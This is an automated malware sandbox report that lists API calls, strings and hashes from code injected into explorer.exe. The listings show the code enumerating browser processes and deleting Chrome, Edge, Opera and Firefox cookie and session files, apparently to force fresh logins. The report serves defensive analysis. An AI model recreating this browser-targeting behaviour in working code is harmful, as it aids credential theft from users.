                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                                                                                              • String ID: %s%s$*.*
                                                                                                                                                                                                                              • API String ID: 2055899612-705776850
                                                                                                                                                                                                                              • Opcode ID: 27c883c087221bfdb8ee531f76d3cbc9e5181e8dd9133b7a8ff67b6260764128
                                                                                                                                                                                                                              • Instruction ID: c93bf9b2e8e56afc53682105c6129ca4685e6e9e272aacb4fdf83a05565c47fc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27c883c087221bfdb8ee531f76d3cbc9e5181e8dd9133b7a8ff67b6260764128
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6115CF52023005BD314FB7A9C48BAF7BDCDFC5255F000538FD5286292DB788B9482A6

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0304142A
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?), ref: 03041439
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03041476
                                                                                                                                                                                                                                • Part of subcall function 030414D8: wsprintfW.USER32 ref: 0304150D
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
                                                                                                                                                                                                                                • Part of subcall function 030414D8: wsprintfW.USER32 ref: 03041557
                                                                                                                                                                                                                                • Part of subcall function 030414D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
                                                                                                                                                                                                                                • Part of subcall function 030414D8: DeleteFileW.KERNELBASE(00000000), ref: 03041571
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindClose.KERNELBASE(00000000), ref: 0304158F
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(00000000), ref: 0304149C
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 030414AF
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 030414BA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                                                                                                                                                                                                                              • String ID: %s%s$%s%s\$*.*
                                                                                                                                                                                                                              • API String ID: 2055899612-4093207852
                                                                                                                                                                                                                              • Opcode ID: cd6753f5e0708f79a780b18dacc45dd4d7125bb3f60f65ec6c9eb315d09f8fe1
                                                                                                                                                                                                                              • Instruction ID: f6d1b94b05c5f3abc1bbcac6052229c18d598ef33554ae85a03b43f79fdd76c8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd6753f5e0708f79a780b18dacc45dd4d7125bb3f60f65ec6c9eb315d09f8fe1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A11102B42063406BD318FB6AEC48BBFBADCEFC5245F04053CF95182192DB794A888662

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03043DAF
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 03043DE2
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF), ref: 03043DEB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4050682147-0
                                                                                                                                                                                                                              • Opcode ID: 76ac08b3ff1dddaae715170c7de6e803f0f88334adc59ee7e5cddeffe73495f5
                                                                                                                                                                                                                              • Instruction ID: 70a0446960746e4819c92d37c5f84a3ec13182e133b3c9b282fe6d07ae90fb9b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76ac08b3ff1dddaae715170c7de6e803f0f88334adc59ee7e5cddeffe73495f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B01B9FC403610ABC728FB65E548BEB7BACDB46311F0455B994158B1C4D77B8751CB60

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 312 3042ea8-3042ebc StrStrIA 313 3042ecd-3042ed1 312->313 314 3042ebe-3042eca call 3042e1b 312->314 314->313
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,03043CD2), ref: 03042EB4
                                                                                                                                                                                                                                • Part of subcall function 03042E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,03042EC5), ref: 03042E27
                                                                                                                                                                                                                                • Part of subcall function 03042E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 03042E52
                                                                                                                                                                                                                                • Part of subcall function 03042E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 03042E7F
                                                                                                                                                                                                                                • Part of subcall function 03042E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 03042E92
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • chrome.exe|opera.exe|msedge.exe, xrefs: 03042EAB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$InformationQuery$Open
                                                                                                                                                                                                                              • String ID: chrome.exe|opera.exe|msedge.exe
                                                                                                                                                                                                                              • API String ID: 4117927671-3743313796
                                                                                                                                                                                                                              • Opcode ID: 252b7fb23345d60ffb38140bf5386bb3d5da301efcf49c3c6eeed19b3b4b8409
                                                                                                                                                                                                                              • Instruction ID: f87b79dc1f8a30fc71d552c75fe8300d84963ce5b46f110b8d126d133a0f39a0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 252b7fb23345d60ffb38140bf5386bb3d5da301efcf49c3c6eeed19b3b4b8409
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61D0A9B63026200B572CA57B6C09B7F94CDCACA8A230A053EF802DB200EA90CE0342A0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
                                                                                                                                                                                                                                • Part of subcall function 03041363: Process32First.KERNEL32(00000000,?), ref: 03041393
                                                                                                                                                                                                                                • Part of subcall function 03041363: CloseHandle.KERNELBASE(00000000), ref: 030413CB
                                                                                                                                                                                                                                • Part of subcall function 03041363: lstrcmpiA.KERNEL32(?), ref: 030413A3
                                                                                                                                                                                                                                • Part of subcall function 03041363: Process32Next.KERNEL32(00000000,00000128), ref: 030413C0
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043731
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043752
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043764
                                                                                                                                                                                                                                • Part of subcall function 030415BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 030415EB
                                                                                                                                                                                                                                • Part of subcall function 030415BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 030415F7
                                                                                                                                                                                                                                • Part of subcall function 030415BE: lstrcmpiW.KERNEL32(?,030441C8), ref: 03041623
                                                                                                                                                                                                                                • Part of subcall function 030415BE: lstrcmpiW.KERNEL32(?,030441CC), ref: 03041633
                                                                                                                                                                                                                                • Part of subcall function 030415BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0304164C
                                                                                                                                                                                                                                • Part of subcall function 030415BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0304169C
                                                                                                                                                                                                                                • Part of subcall function 030415BE: FindClose.KERNELBASE(00000000), ref: 030416AB
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0304377A
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 03043783
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 0304378F
                                                                                                                                                                                                                              • RtlZeroMemory.NTDLL(00000000,00001000), ref: 030437A3
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 030437AC
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\,?,00000000,00000001,?,?,03043839,?,03043C53,00000001), ref: 030437B8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                                                                                                                                                                                                                              • API String ID: 909495591-1175993956
                                                                                                                                                                                                                              • Opcode ID: 3ad5e4f40560673bf08423f8d3c0f884733c976e6c3da2add5e6d7f85fb88dc5
                                                                                                                                                                                                                              • Instruction ID: 71ad251b59958dd865c84a354e2cba4ef3d765b64e3de90394b1b48619108cd3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ad5e4f40560673bf08423f8d3c0f884733c976e6c3da2add5e6d7f85fb88dc5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A01102F834375836E038F2675D82FAF5589CFD5A91F000034F6456E2C1CF94AB4245AA

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 03043C1F
                                                                                                                                                                                                                                • Part of subcall function 03041235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0304123F
                                                                                                                                                                                                                                • Part of subcall function 03041235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03043C33), ref: 03041251
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03043C69
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 03043C88
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 03043CA1
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 03043CB1
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03043CC1
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03043D12
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 03043D68
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 03043D77
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 03043D82
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(?,?,?,00000000,?,030429DD,00000001), ref: 03041150
                                                                                                                                                                                                                                • Part of subcall function 03041141: lstrlen.KERNEL32(:method POST,?,00000000,?,030429DD,00000001), ref: 03041155
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                                                                                              • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                                                                                                                                                                                              • API String ID: 2509890648-2554907557
                                                                                                                                                                                                                              • Opcode ID: bbf905755e3ad8417af9109ee27a85ec93a5d38723a509f5cfba1e9a8957a35a
                                                                                                                                                                                                                              • Instruction ID: 2ca3c454d713730112b0966c5209778fa48bc5eca0e60763c8080c7b3a17d473
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbf905755e3ad8417af9109ee27a85ec93a5d38723a509f5cfba1e9a8957a35a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 284124F8202304ABC628FB75E944BBF73A9AFC5600F044578B8518B185EB39DB1686A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
                                                                                                                                                                                                                                • Part of subcall function 03041363: Process32First.KERNEL32(00000000,?), ref: 03041393
                                                                                                                                                                                                                                • Part of subcall function 03041363: CloseHandle.KERNELBASE(00000000), ref: 030413CB
                                                                                                                                                                                                                                • Part of subcall function 03041363: lstrcmpiA.KERNEL32(?), ref: 030413A3
                                                                                                                                                                                                                                • Part of subcall function 03041363: Process32Next.KERNEL32(00000000,00000128), ref: 030413C0
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8,?,00000000,?,0304382F,?,03043C53,00000001), ref: 030435FA
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043613
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043623
                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 03043644
                                                                                                                                                                                                                                • Part of subcall function 030414D8: wsprintfW.USER32 ref: 0304150D
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
                                                                                                                                                                                                                                • Part of subcall function 030414D8: wsprintfW.USER32 ref: 03041557
                                                                                                                                                                                                                                • Part of subcall function 030414D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
                                                                                                                                                                                                                                • Part of subcall function 030414D8: DeleteFileW.KERNELBASE(00000000), ref: 03041571
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindClose.KERNELBASE(00000000), ref: 0304158F
                                                                                                                                                                                                                                • Part of subcall function 03041011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
                                                                                                                                                                                                                                • Part of subcall function 03041011: RtlFreeHeap.NTDLL(00000000), ref: 03041027
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043672
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,03044614,?,00000000,?,0304382F,?,03043C53,00000001), ref: 03043682
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                                                                                                                                                                                              • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                                                                                                                                                                                              • API String ID: 2436889709-3669280581
                                                                                                                                                                                                                              • Opcode ID: fce760b7398d1c610031d55792370ae4f3316f778a1189afd5eb5ce444f10483
                                                                                                                                                                                                                              • Instruction ID: 07ad3b81e1512cb288f6284f88e3370c870282f801499c622752b9118b09a8bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fce760b7398d1c610031d55792370ae4f3316f778a1189afd5eb5ce444f10483
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B511CCF834370077E668B76BAD99F7E1599DBD5B42F050038F605AE2C1DF940B814279

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
                                                                                                                                                                                                                                • Part of subcall function 03041363: Process32First.KERNEL32(00000000,?), ref: 03041393
                                                                                                                                                                                                                                • Part of subcall function 03041363: CloseHandle.KERNELBASE(00000000), ref: 030413CB
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8,?,00000000,?,03043834,?,03043C53,00000001), ref: 030436B3
                                                                                                                                                                                                                                • Part of subcall function 03041000: GetProcessHeap.KERNEL32(00000008,00000208,03041418), ref: 03041003
                                                                                                                                                                                                                                • Part of subcall function 03041000: RtlAllocateHeap.NTDLL(00000000), ref: 0304100A
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,03043834,?,03043C53,00000001), ref: 030436CC
                                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,03043834,?,03043C53,00000001), ref: 030436DC
                                                                                                                                                                                                                                • Part of subcall function 030414D8: wsprintfW.USER32 ref: 0304150D
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0304151C
                                                                                                                                                                                                                                • Part of subcall function 030414D8: wsprintfW.USER32 ref: 03041557
                                                                                                                                                                                                                                • Part of subcall function 030414D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0304156A
                                                                                                                                                                                                                                • Part of subcall function 030414D8: DeleteFileW.KERNELBASE(00000000), ref: 03041571
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 03041584
                                                                                                                                                                                                                                • Part of subcall function 030414D8: FindClose.KERNELBASE(00000000), ref: 0304158F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                                                                                                                                                                                              • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                                                                                                                                                                                              • API String ID: 2731919298-637609321
                                                                                                                                                                                                                              • Opcode ID: fa56e54d3ec0760bf02aeb04dc94853960ef1cf2cd851558a13fc06b558be31b
                                                                                                                                                                                                                              • Instruction ID: c8f6e61ce377d994610fdc3b89dc6e2a1e5d2ffd23207378f06f2b01c931deaa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa56e54d3ec0760bf02aeb04dc94853960ef1cf2cd851558a13fc06b558be31b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5CF0A7E930361033952C736BBD0DFAF199DDBD6A52700013CB1069A580CF980B42427A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 279 3041363-304137f CreateToolhelp32Snapshot 280 30413d1-30413d6 279->280 281 3041381-3041399 Process32First 279->281 282 30413c6-30413c8 281->282 283 30413ca-30413cb CloseHandle 282->283 284 304139b-30413ab lstrcmpiA 282->284 283->280 285 30413ad-30413b3 call 304133f 284->285 286 30413b8-30413c0 Process32Next 284->286 285->286 286->282
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03041374
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 03041393
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?), ref: 030413A3
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 030413C0
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 030413CB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 868014591-0
                                                                                                                                                                                                                              • Opcode ID: 9ef76c2173d783625343ade137d3039ad52d597efeed17ce24140b4a3cbf2b39
                                                                                                                                                                                                                              • Instruction ID: baabb706ebd34123af7a31f2b93eb82a62c8586887a315dc59b47571bd5d665c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ef76c2173d783625343ade137d3039ad52d597efeed17ce24140b4a3cbf2b39
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B3F0C8F55031149BD774AA269D0CBDE77BCEB49322F0001B0F859E2180FB784BA48A98

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 309 3041235-3041247 OpenFileMappingA 310 304125c-3041260 309->310 311 3041249-3041259 MapViewOfFile 309->311 311->310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0304123F
                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,03043C33), ref: 03041251
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                                              • Opcode ID: 752c6d2c76eabce77f077b8798e9d892e1bd40c2bc4a7a2670e8dea45289345b
                                                                                                                                                                                                                              • Instruction ID: 9ce36f9de1150b257f54eef353155a51270bf2a962f51c4940836216db39d735
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 752c6d2c76eabce77f077b8798e9d892e1bd40c2bc4a7a2670e8dea45289345b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D017B67062317BE3346ABB6C0CF83AEDDDF86AE1B054025B509D2140D6608920C2F0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 317 3041011-304101b call 3041274 320 304102d-304102e 317->320 321 304101d-3041027 GetProcessHeap RtlFreeHeap 317->321 321->320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03041274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 03041281
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,030414CB), ref: 03041020
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 03041027
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2580854192-0
                                                                                                                                                                                                                              • Opcode ID: 7f080ca06aa00a282d3cb9cc2db20c2365fbad29840f51eec76404db0df1df3a
                                                                                                                                                                                                                              • Instruction ID: 9320c4d311d13dd935f2d10372012c167dd35d6fbde3f5467f62cb773d181fd7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f080ca06aa00a282d3cb9cc2db20c2365fbad29840f51eec76404db0df1df3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64C08CF580726096CA6477E27A0CBC62A089F09111F0800A1B404D6085CBB88A6482A0

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 322 30415a9-30415bd SetFileAttributesW DeleteFileW
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,0304168B), ref: 030415AF
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 030415B6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000014.00000002.3006716288.0000000003041000.00000040.80000000.00040000.00000000.sdmp, Offset: 03041000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_3041000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
